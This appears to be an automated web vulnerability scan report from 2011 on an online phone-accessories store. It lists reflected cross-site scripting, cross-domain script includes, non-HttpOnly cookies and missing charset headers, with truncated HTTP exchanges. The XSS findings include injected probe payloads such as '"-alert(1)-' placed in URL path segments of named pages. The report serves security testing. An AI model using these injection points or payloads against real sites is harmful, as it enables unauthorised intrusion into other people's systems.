1. Cross-site scripting (reflected)
1.2. http://store.androidcentral.com/cart.htm [REST URL parameter 1]
1.3. http://store.androidcentral.com/content/customercare/index.htm [REST URL parameter 2]
1.4. http://store.androidcentral.com/content/customercare/index.htm [REST URL parameter 3]
1.5. http://store.androidcentral.com/content/customercare/page-shipping.htm [REST URL parameter 2]
1.6. http://store.androidcentral.com/content/customercare/page-shipping.htm [REST URL parameter 3]
1.7. http://store.androidcentral.com/external_marketing/js_a_v1.php [width parameter]
3. Cross-domain script include
3.1. http://store.androidcentral.com/belkin-headphone-splitter-y-adapter/11A75A6767.htm
3.2. http://store.androidcentral.com/cart.htm
3.3. http://store.androidcentral.com/jabra-bt2080-bluetooth-headset/9A32A5717.htm
4. Cookie without HttpOnly flag set
5.1. http://store.androidcentral.com/content/customercare/index.htm
5.2. http://store.androidcentral.com/javascripts/spe-v3.js
7. HTML does not specify charset
7.1. http://store.androidcentral.com/
7.2. http://store.androidcentral.com/belkin-headphone-splitter-y-adapter/11A75A6767.htm
7.3. http://store.androidcentral.com/cart.htm
7.4. http://store.androidcentral.com/content/customercare/index.htm
7.5. http://store.androidcentral.com/content/customercare/page-shipping.htm
7.6. http://store.androidcentral.com/favicon.ico
7.7. http://store.androidcentral.com/jabra-bt2080-bluetooth-headset/9A32A5717.htm
7.8. http://store.androidcentral.com/motorola-droid-x-batteries.htm
7.9. http://store.androidcentral.com/motorola-droid-x-bluetooth.htm
7.10. http://store.androidcentral.com/motorola-droid-x-headsets.htm
Severity: | High |
Confidence: | Certain |
Host: | http://store.android |
Path: | /belkin-headphone |
GET /belkin-headphone Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:09:12 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 58651 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... ('initializeDeviceSe location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.android |
Path: | /cart.htm |
GET /cart.htm52c76"-alert(1)- Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:13:34 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Accel-Expires: 0 Content-Length: 78268 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... ce) { if (device) { setCookie('initializ location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.android |
Path: | /content/customercare |
GET /content/customercare6b540"-alert(1)- Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:07:38 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 68949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... evice) { setCookie('initializ location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.android |
Path: | /content/customercare |
GET /content/customercare Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:08:10 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 23866 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... { setCookie('initializ location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.android |
Path: | /content/customercare |
GET /content/customercare3c6fc"-alert(1)- Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:08:17 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 69018 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... evice) { setCookie('initializ location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.android |
Path: | /content/customercare |
GET /content/customercare Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:08:49 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 25077 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... setCookie('initializ location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.android |
Path: | /external_marketing/js_a |
GET /external_marketing/js_a Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://www.androidcentral User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 13:33:52 GMT Content-Type: application/x-javascript Connection: keep-alive Cache-Control: no-cache Content-Length: 11914 document.write ("<style type='text/css'> .js_a_v1 {margin:0;padding:0;text ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://store.android |
Path: | /jabra-bt2080-bluetooth |
GET /jabra-bt2080-bluetooth Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:09:30 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 60691 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... Cookie('initializeDe location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /cart.htm |
GET /cart.htm HTTP/1.1 Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:05:14 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Accel-Expires: 0 Content-Length: 84595 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... <div align=center><form method="POST" action="https://checkout <input type="hidden" name="cart" value="PD94bWwgdmVyc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /belkin-headphone |
GET /belkin-headphone Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:39 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 58651 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... </div> <script type='text/javascript' src='http://s7.addthis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /cart.htm |
GET /cart.htm HTTP/1.1 Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:05:14 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Accel-Expires: 0 Content-Length: 84595 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... <div style='text-align:center ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /jabra-bt2080-bluetooth |
GET /jabra-bt2080-bluetooth Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:49 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 60867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... </div> <script type='text/javascript' src='http://s7.addthis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | / |
GET / HTTP/1.1 Host: store.androidcentral.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __utmv=261175122.www |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:14 GMT Content-Type: text/html Connection: keep-alive Set-Cookie: PHPSESSID=ksfbio4jsc Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: visitor_id=d5797e0d3 Set-Cookie: device_id_history=0; path=/; httponly Content-Length: 83431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /content/customercare |
GET /content/customercare Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:16 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 23990 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... <a class='underline' href='mailto:officeofthepresident ...[SNIP]... <a class='underline' href='mailto:sales@androidcentral.com'> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /javascripts/spe-v3.js |
GET /javascripts/spe-v3.js HTTP/1.1 Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __utmv=261175122.www |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:01:32 GMT Content-Type: application/x-javascript Last-Modified: Wed, 13 Apr 2011 05:02:57 GMT Connection: keep-alive Expires: Tue, 10 May 2011 15:01:32 GMT Cache-Control: max-age=3600 Content-Length: 176268 /************************ Name: Highslide JS Version: 4.1.2 (March 27 2009) Config: default +events +unobtrusive +imagemap +slideshow +posi ...[SNIP]... <brian@cherne.net> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /external_marketing/js_a |
GET /robots.txt HTTP/1.0 Host: store.androidcentral.com |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 13:33:35 GMT Content-Type: text/plain Connection: close User-agent: * Disallow: /v2_process/ Disallow: /v2_templates/ Disallow: /v3_templates/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | / |
GET / HTTP/1.1 Host: store.androidcentral.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __utmv=261175122.www |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:14 GMT Content-Type: text/html Connection: keep-alive Set-Cookie: PHPSESSID=ksfbio4jsc Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: visitor_id=d5797e0d3 Set-Cookie: device_id_history=0; path=/; httponly Content-Length: 83431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /belkin-headphone |
GET /belkin-headphone Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:39 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 58651 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /cart.htm |
GET /cart.htm HTTP/1.1 Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:05:14 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Accel-Expires: 0 Content-Length: 84595 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /content/customercare |
GET /content/customercare Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:16 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 23990 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /content/customercare |
GET /content/customercare Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:41 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 25004 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: store.androidcentral.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __utmv=261175122.www |
HTTP/1.1 404 Not Found Server: spe Date: Tue, 10 May 2011 14:04:14 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive <html> <head><title>404 Not Found</title></head> <body bgcolor="white"> <center><h1>404 Not Found</h1></center> <hr><center>nginx</center </body> </html> <!-- a padding to disable MSIE and Chr ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /jabra-bt2080-bluetooth |
GET /jabra-bt2080-bluetooth Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:49 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 60867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /motorola-droid-x |
GET /motorola-droid-x Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:36 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 40705 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /motorola-droid-x |
GET /motorola-droid-x Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:46 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 49340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.android |
Path: | /motorola-droid-x |
GET /motorola-droid-x Host: store.androidcentral.com Proxy-Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aclastvisit=1305033271; aclastactivity=0; __qca=P0-1090520878 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:38 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 62182 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |